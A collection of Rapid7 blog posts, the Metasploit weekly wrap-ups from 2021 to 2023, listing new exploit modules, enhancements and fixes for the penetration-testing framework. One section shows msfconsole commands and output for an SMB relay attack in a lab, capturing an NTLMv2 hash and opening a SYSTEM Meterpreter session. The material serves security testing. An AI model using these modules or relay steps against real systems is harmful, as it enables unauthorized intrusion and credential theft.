All posts by Jeffrey Martin

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/06/23/metasploit-weekly-wrap-up-16/

I like to MOVEit, MOVEit, We like to MOVEit!

Metasploit Weekly Wrap-Up

Party hard just like it’s Mardi Gras! bwatters-r7 delivered the dance moves this week with a masterful performance. The windows/http/moveit_cve_2023_34362 module is available for all your party needs, taking advantage of CVE-2023-34362, this module gets into the MOVEit database and nets shells to help you "Keep on jumpin’ off the floor"!

New module content (1)

MOVEit SQL Injection vulnerability

Authors: bwatters-r7, rbowes-r7, and sfewer-r7
Type: Exploit
Pull request: #18100 contributed by bwatters-r7
AttackerKB reference: CVE-2023-34362

Description: Adds a new module targeting the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.

Enhancements and features (7)

  • #18078 from zeroSteiner – This adds support to the auxiliary/admin/dcerpc/icpr_cert module to issue certificates for an explicit SID by specifying it within the NTDS_CA_SECURITY_EXT. This addition ensures that ESC1 will remain exploitable when issuing certificates with an SID becomes a requirement.
  • #18117 from smashery – This adds Windows 10 revision number extraction to the Windows version Post API.
  • #18118 from smashery – This PR updates the User Agent strings for June 2023.
  • #18119 from adfoster-r7 – This adds support for only running user specified test names in modules loaded by running loadpath test/modules.
  • #18126 from adfoster-r7 – This PR adds additional logging to the test/file module. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • #18127 from adfoster-r7 – This PR adds additional test/railgun_reverse_lookup tests for macOS and Linux.

Bugs fixed (5)

  • #17576 from gwillcox-r7 – This fixes a bug where adding and deleting tags to multiple hosts was not functioning correctly.
  • #18049 from cgranleese-r7 – This PR updates Jenkins modules to work with newer versions. Previously they fell over with a CSRF failure and gave a false negative result.
  • #18094 from zeroSteiner – Fixes an edgecase with windows/meterpreter/reverse_tcp where there was a small chance of an invalid stager being created.
  • #18104 from adfoster-r7 – This PR fixes an issue that falsely caused empty file reads on Meterpreter.
  • #18124 from adfoster-r7 – Fixes the broken test/extapi module. The module was facing issues returning clipboard data that pertained to the session being tested, this issue has been resolved. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • #18132 from jmartin-r7 – This PR reverts the changes from #17942 which was an improvement to AMSI bypass on new versions of windows. PR #17942 broke psexec and this PR reverts that issue.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/04/07/metasploit-weekly-wrap-up-5/

The tide rolls in and out.

Metasploit Weekly Wrap-Up

The flood of new modules last week crested leaving ample time for documentation updates this week. The team and the community seem to have focused on getting those sweet sprinkles of information that help everyone understand Metasploit out to the world.

Enhancements and features (1)

  • #17458 from steve-embling – Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS.

Bugs fixed (4)

  • #17778 from adfoster-r7 – Updates the Metasploit database migration code to no longer break the test suite when running locally.
  • #17823 from bcoles – This fixes an issue in the check method where targets with files containing no PHP code were falsely reported as safe.
  • #17835 from bcoles – Fixes a bug in auxiliary/admin/networking/cisco_dcnm_auth_bypass where the bypass_auth method would break if a user supplied a TARGETURI path without a trailing /.
  • #17844 from SubcomandanteMeowcos – Fixes broken documentation references in the secretsdump, zemra_panel_rce, and windows/gather/credentials/skype modules.

Documentation added (6)

  • #17836 from jheysel-r7 – Documents the usage of session.platform in the How to get started with writing a post-module documentation.
  • #17837 from cdelafuente-r7 – Updates the ‘How to write a check method’ page to include using the Msf::Exploit::Remote::AutoCheck mixin, which will automatically run a check method against a target before attempting to exploit it.
  • #17838 from zeroSteiner – Updates the How to use railgun for windows post exploitation documentation with the latest conventions for using Meterpreter’s Railgun when wanting to interact with Windows APIs on a remote target.
  • #17840 from jheysel-r7 – Updates the ‘Get started writing an Exploit’ example documentation to describe the usage of Stability/Reliability/SideEffects metadata when writing modules.
  • #17841 from jheysel-r7 – Documents the latest labels that can be assigned to pull requests.
  • #17842 from bwatters-r7 – Updates the How to use command stagers documentation with additional examples and clearer descriptions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/01/20/metasploit-weekly-wrap-up-189/

See something say something

Metasploit Weekly Wrap-Up

Have an idea on how to expand on Metasploit Documentation on https://docs.metasploit.com/? Did you see a typo or some other error on the docs site? Thanks to adfoster-r7, submitting an update to the documentation is as easy as clicking the ‘Edit this page on GitHub’ link on the page you want to change. The new link will take you directly to the source in Metasploit’s GitHub so you can quickly locate the Markdown and submit a PR.

New module content (3)

Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit

Author: Krzysztof Burghardt
Type: Auxiliary
Pull request: #17348 contributed by burghardt
AttackerKB reference: CVE-2022-46770

Description: This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.

WordPress Paid Membership Pro code Unauthenticated SQLi

Authors: Joshua Martinelle and h00die
Type: Auxiliary
Pull request: #17479 contributed by h00die
AttackerKB reference: CVE-2023-23488

Description: This adds an exploit module that leverages an unauthenticated SQLi against WordPress plugin Paid Membership Pro. This vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. This module retrieves WordPress usernames and password hashes using Time-Based Blind SQL Injection technique.

Ivanti Cloud Services Appliance (CSA) Command Injection

Authors: Jakub Kramarz and h00die-gr3y
Type: Exploit
Pull request: #17449 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-44529

Description: A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.

Enhancements and features (5)

  • #17343 from h00die – This makes performance improvements to the windows/local/unquoted_service_path module.
  • #17451 from h00die – This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
  • #17466 from prabhatjoshi321 – This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
  • #17473 from adfoster-r7 – Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
  • #17480 from h00die – A new alias has been added for payloads called exploit which will perform the same action as to_handler, to help users familiar with exploit modules to use the same familiar exploit method to open handlers when using payloads.

Bugs fixed (3)

  • #17385 from smashery – This fixes the file write and file append methods to return the expected Boolean values rather than nil.
  • #17482 from adfoster-r7 – Fixes a connection issue with reverse_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
  • #17491 from zeroSteiner – A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/09/23/metasploit-weekly-wrap-up-177/

Have you built out that awesome media room?

Metasploit Weekly Wrap-Up

If your guilty pleasures include using a mobile device to make your home entertainment system WOW your guests, you might be using Unified Remote. I hope you are extra cautious about what devices you let on that WiFi network. A prolific community member h00die added a module this week that uses a recently published vulnerability from H4RK3NZ0 to leverage an unprotected configuration page exposed on the media service, combined with just a little bit of protocol info the module makes that media server a prime target for pranks and other less friendly activities by guests on the network.

Finding the needles in that Linux memory stack

Brought to you by the combined efforts of many members of the Metasploit Community, Linux meterpeter payloads now offer a new way to hunt down passwords in memory on all those delicious Linux sessions you gather with Metasploit. The new post/linux/gather/mimipenguin module hunts down clear text passwords in Linux memory based on MimiPenguin.

We all love to share code with the public

A new module this week makes sharing public code risky business if you are using a bitbucket server to host that repository. Checkout out the nitty gritty in our blog post from earlier this week.

Metasploit plays well with others

Last week’s update brought with it an awesome way to utilize Metasploit with payload generated by Sliver that even ranked a call out in their latest release notes. Great to see the community promoting these updates for more people to learn about and utilize.

New module content (4)

Enhancements and features (6)

  • #16940 from adfoster-r7 – Rewrites Metasploit’s datastore to fix multiple bugs and edge cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again. Explicitly clearing a datastore value can be done with the set --clear OptionName command. Modules that require protocol specific option names such as SMBUser/FTPUser/BIND_DN/etc can now be consistently set with just username/password/domain options, i.e. set username Administrator instead of set SMBUser Administrator. This rewrite is currently behind a feature flag which can be enabled with features set datastore_fallbacks true.
  • #17002 from bcoles – The lib/msf/core/post/windows/accounts.rb, lib/msf/core/post/windows/ldap.rb, and lib/msf/core/post/windows/wmic.rb libraries have been updated to replace calls to load_extapi with ExtAPI compatibility checks which will check if the session supports ExtAPI, since if the sessions supports ExtAPI, it should already be loaded.
  • #17003 from bcolesenum_patches has had its code updated to output the patches enumerated as a table and store the results long term in a CSV file. Additionally, a check has been added to see if the current session supports the required Meterpreter extension compatibility prior to trying to run the module. Finally, the code and documentation have been cleaned up and modernized.
  • #17015 from jmartin-r7 – Updates auxiliary/scanner/http/http_login to report login success when the http status code is in the range 200,201,300-308. This functionality is user-configurable with set HttpSuccessCodes 200.
  • #17049 from bcoles – Adds Notes module meta information and replaces custom get_members method with get_members_from_group from the Post API.
  • #17051 from bcoles – Adds module documentation, notes for module meta information, and improves module error handling.

Bugs fixed (3)

  • #17023 from zeroSteiner – The post/windows/manage/rollback_defender_signatures module has been updated to work on WoW64 sessions, and has had its code updated so that the default action is now a valid option.
  • #17036 from zeroSteiner – Fixes a bug where the sessions command would show the connection as coming from losthost 127.0.0.1, instead of the correct peer host address for reverse_http Meterpreter sessions.
  • #17052 from adfoster-r7 – Fixes an error in Metasploit-framework when the host machine has OpenSSL 3.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/

Putting in the work!

Metasploit Weekly Wrap-Up

This week we’re extra grateful for the fantastic contributions our community makes to Metasploit. The Metasploit team landed more than 5 PRs each from Ron Bowes and bcoles, adding some great new capabilities.

Ron Bowes contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.

Contributions from bcoles offer improvements to various session interactions to make gathering data on targets more robust and consistent.

Have you seen Cassandra?

Are you using tools to visualize your data? If you are using cassandra-web, a tool made specifically to help you "see" what Cassandra holds, there are new toys for attackers to use to access much more. The new module from krastanoel targets cassandra-web <= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.

New module content (6)

  • Cassandra Web File Read Vulnerability by Jeremy Brown and krastanoel – This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
  • UnRAR Path Traversal (CVE-2022-30333) by Ron Bowes and Simon Scannell, which exploits CVE-2022-30333 – This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). The first module creates a .rar with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the .rar file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.
  • Webmin Package Updates RCE by Christophe De La Fuente and Emir Polat, which exploits CVE-2022-36446 – This module exploits an arbitrary command injection in Webmin versions prior to 1.997.
  • UnRAR Path Traversal in Zimbra (CVE-2022-30333) by Ron Bowes and Simon Scannell, which exploits CVE-2022-30333 – This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open source version 6.1.6 and earlier). The first module creates a .rar with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the .rar file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.
  • Zimbra zmslapd arbitrary module load by Darren Martyn and Ron Bowes, which exploits CVE-2022-37393 – This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.
  • ManageEngine ADAudit Plus CVE-2022-28219 by Naveen Sunkavally and Ron Bowes, which exploits CVE-2022-28219 – This adds a module that leverages a Java deserialization, directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution again vulnerable versions of ManageEngine ADAudit Plus.

Enhancements and features (6)

  • #16800 from adfoster-r7 – This adds support for OpenSSL 3 compatibility with legacy ciphers.
  • #16841 from bcoles – This updates the post/windows/gather/enum_powershell_env module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.
  • #16873 from bcoles – This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-meterpreter sessions.
  • #16875 from bcoles – This PR removes the Remove enum_putty Meterpreter script in favor for the existing post module.
  • #16876 from bcoles – Removed the enum_logged_on_users Meterpreter script in favor for the existing post module
  • #16878 from bcoles – Adds partial support for non-Meterpreter sessions for the enum_logged_on_users post module as well as makes use of the read_profile_list method. Resolves Rubocop and msftidy_docs violations.

Bugs fixed (1)

  • #16872 from bcoles – This PR fixes shell_registry_getvalinfo which was truncating registry values at the first space and normalize_key which was causing a crash when only a hive name was passed to the function when running on a shell session.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/06/03/metasploit-weekly-wrap-up-160/

Ask and you may receive

Metasploit Weekly Wrap-Up

Module suggestions for the win, this week we see a new module written by jheysel-r7 based on CVE-2022-26352 that happens to have been suggested by jvoisin in the issue queue last month. This module targets an arbitrary file upload in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7 to obtain shells. Make sure you have covered your bases for permission to target this vulnerability before testing this as one blog post suggests some banking sites may rely on this tool.

Everything comes full circle

As the GSoC 2022 program starts to ramp up, a contributor that participated in 2020, red0xff, contributed an enhancement to SQLi library support to give module writers a quicker path to injection on Microsoft SQL. The enhancement updates the auxiliary/gather/billquick_txtid_sqli module to showcase library utility and can reduce logic code required in modules significantly—saving about 20% in this one instance.

New module content (2)

  • DotCMS RCE via Arbitrary File Upload by Hussein Daher, Shubham Shah, and jheysel-r7, which exploits CVE-2022-26352 – Adds an exploit module that leverages CVE-2022-26352, an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7, that allows an attacker to execute arbitrary code remotely in the context of the user running the application. The module uploads a .jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
  • MyBB Admin Control Code Injection RCE by Altelus, Christophe De La Fuente, and Cillian Collins, which exploits CVE-2022-24734 – Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control is required for this exploit to work and the account must have rights to add or update settings.

Enhancements and features (2)

  • #16435 from red0xff – This adds support for Microsoft SQL Server to the SQL injection library. Additionally, this updates the auxiliary/gather/billquick_txtid_sqli module to leverage the new library features for exploitation.
  • #16492 from h00die – Improves the nfs_mount scanner module by detecting if a NFS network share is mountable or not based on the provided IP address and hostname.

Bugs fixed (2)

  • #16621 from sjanusz-r7 – Fixes a bug where running multi/manage/shell_to_meterpreter to upgrade from a Python Meterpreter session to a Native Meterpreter session would kill the original Meterpreter session.
  • #16640 from zeroSteiner – A bug has been fixed where the Net::LDAP library would fail due to the socket returning less data than was requested. This was addressed by introducing a custom read() method to appropriately handle cases where the socket may return less data than was expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/03/11/metasploit-weekly-wrap-up-3/

Mucking out the pipes.

Metasploit Weekly Wrap-Up

Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber’s training. The exploit targeting modern Linux v5 kernels helps elevate user privileges by overwriting a SUID binary of your choice by plunging some payload gold through a pipe.

Long live the SMB relay!

SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7 the windows/smb/smb_relay module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through them to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation

Return of the GSoC!

The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications are will open April 4th and close April 19th. Changes this year open the program up to all newcomers of open source that are 18 years and older. Join use on #slack and checkout our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you’d like to add to Metasploit.

New module content (5)

Enhancements and features

  • #16135 from sjanusz-r7 – This adds support for logging Meterpreter’s TLV Packets with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>.
  • #16141 from adfoster-r7 – This adds service manager commands to msfconsole.
  • #16219 from sjanusz-r7 – This updates the packet inspection for the enumextcmd and loadlib commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.
  • #16258 from sjanusz-r7 – This improves Meterpreter’s TLV logging support to show human readable names for the Meterpreter TLV values of. To view this functionality run setg SessionTlvLogging true with a Meterpreter session open. Next, run a Meterpreter command such as dir.
  • #16269 from bcoles – This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
  • #16270 from bcoles – This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
  • #16282 from 3V3RYONE – This adds the lcat command to Meterpreter which allows the user to cat a local file.
  • #16288 from bcoles – This change display the output of apktool if the apktool output contains Java exceptions, which is useful for debugging errors in Android APK injection.

Bugs fixed

  • #16145 from adfoster-r7 – This fixes a case sensitivity issue with option handling for the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
  • #16153 from jmartin-r7 – This fixes a bug in the auxiliary/client/smtp/emailer which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
  • #16265 from smashery – This fixes an edgecase which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
  • #16268 from bwatters-r7 – This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.
  • #16283 from bcoles – This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
  • #16286 from bcoles – This fixes a payload truncation issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
  • #16294 from bcoles – This change fixes the Android APK injection functionality of msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
  • #16310 from adfoster-r7 – This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
  • #16311 from sjanusz-r7 – This updates msfconsole’s search functionality to include the 64 bit variant of payload_windows/x64/encrypted_shell payloads
  • #16312 from bwatters-r7 – This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
  • #16322 from zeroSteiner – This fixes a regression issue with the hosts command tab completion and the --search option’s functionality.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/

Word and Javascript are a rare duo.

Metasploit Wrap-Up

Thanks to thesunRider. you too can experience the wonder of this mystical duo. The sole new metasploit module this release adds a file format attack to generate a very special document. By utilizing Javascript embedded in a Word document to trigger a chain of events that slip through various Windows facilities, a session as the user who opened the document can be yours.

Do you like spiders?

It has been 3 years since SMB2 support was added to smb share enumeration and over a year ago SMB3 support was added, yet the spiders are not done spinning their webs. Thanks to sjanusz-r7 the spiders have evolved to take advantage of these new skills and the webs can span new doorways. Updates to scanner/smb/smb_enumshares improve enumeration support for the latest Windows targets that deploy with SMB3 only by default.

New module content (1)

Enhancements and features

  • #15854 from sjanusz-r7 – This updates the SpiderProfiles option as part of the scanner/smb/smb_enumshares module to now work against newer SMB3 targets, such as windows 10, Windows Server 2016, and above.
  • #15888 from sjanusz-r7 – This adds anonymised database statistics to msfconsole’s debug command, which is used to help developers track down database issues as part of user generated error reports.
  • #15929 from bcoles – This adds nine new Windows 2003 SP2 targets that the exploit/windows/smb/ms08_067_netapi module can exploit.

Bugs fixed

  • #15808 from timwr – This fixes a compatibility issue with Powershell read_file on Windows Server 2012 by using the old style Powershell syntax (New-Object).
  • #15937 from adfoster-r7 – This removes usage of SortedSet to improve support for Ruby 3.
  • #15939 from zeroSteiner – This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/

Anyone enjoy making chains?

Metasploit Wrap-Up

The community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7’s own wvu & Spencer McIntyre added a module that implements the ProxyShell exploit chain originally demonstrated by Orange Tsai. The module also benefited from research and analysis by Jang, PeterJson, brandonshi123, and mekhalleh (RAMELLA Sébastien) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain CVE-2021-31207, CVE-2021-34523, & CVE-2021-34473 into sessions for everyone to enjoy.

Great to see some GSoC value in the wild.

With Google Summer of Code 2021 moving into its final phases, pingport80 had 4 PRs land in this week’s release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.

New module content (2)

Enhancements and features

  • #15540 from dwelch-r7 – This adds an option to cmd_execute to have the command run in a subshell by Meterpreter.
  • #15556 from pingport80 – This adds shell session compatibility to the post/windows/gather/enum_unattend module.
  • #15564 from pingport80 – This adds support to the get_env and command_exists? post API methods for Powershell session types.

Bugs fixed

  • #15303 from pingport80 – This PR ensures that the shell dir command returns a list.
  • #15332 from pingport80 – This improves localization support and compatibly in the session post API related to the rename_file method.
  • #15539 from tomadimitrie – This improves the OS version in the check method of exploit/windows/local/cve_2018_8453_win32k_priv_esc.
  • #15546 from timwr – This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it’s valid first.
  • #15570 from adfoster-r7 – This fixes a bug in the auxiliary/scanner/smb/smb_enum_gpp module where the path that was being generated by the module caused an SMB exception to be raised.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/

Metasploit Wrap-Up

In this week’s round of modules, contributor bcoles offered up two modules to leverage that Apache Flink install you found in some fun new ways. If you are just looking to filch a few files, auxiliary/scanner/http/apache_flink_jobmanager_traversal leverages CVE-2020-17519 to pilfer the filesystem on Flink versions 1.11.0 thru 1.11.2. The second module, for a litte extra fun, exploit/multi/http/apache_flink_jar_upload_exec utilizes the job functionality in Flink to run arbitrary java code as the web server user, turns out there is a meterpreter for that!

RDP: a dream and a nightmare for the sysAdmin near you.

Ever wonder if exposing a remote desktop in a web page was a good idea? I mean, it’s just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module auxiliary/scanner/http/rdp_web_login contributed by Matthew Dunn can even pay attention for you. Using the module you can now enumerate users by setting a few options.

Have you heard of herpaderping?

For those that have, Metasploit now has a new toy for you. Christophe De La Fuente built on some great research by Johnny Shaw, to bring this technique to Metasploit. Using the new evasion/windows/process_herpaderping module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.

Join the community.

For anyone interested in working with Metasploit in this year’s Google Summer of Code, you’ll have to wait until March 9th to find out if we’ve been accepted as mentors. However, you can get a head start by checking out our current project shortlist. Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!

New Modules (4)

Enhancements and features

  • #14784 from bcoles This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.

  • #14617 from zeroSteiner The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Now instead of each version of Meterpreter trying to handle invalid commands, which previously lead to errors, they will instead check if they support that command and then will throw an error message if they do not support that command. Additionally, the output from running the help or ? command inside the meterpreter prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to support checking this functionality works as expected.

  • #14670 from adfoster-r7 Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the creds and search commands. This feature can optionally be turned off by issuing the features set wrapped_tables false command.

  • #14735 from adfoster-r7 Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.

  • #14740 from zeroSteiner This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library).

Bugs Fixed

  • #14748 from cdelafuente-r7 A bug has been fixed in the Auxiliary::AuthBrute that caused a crash when the DB_ALL_USERS or DB_ALL_PASS options were set. This has now been addressed.
  • #14789 from zeroSteiner A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the AutoVerifySession datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.
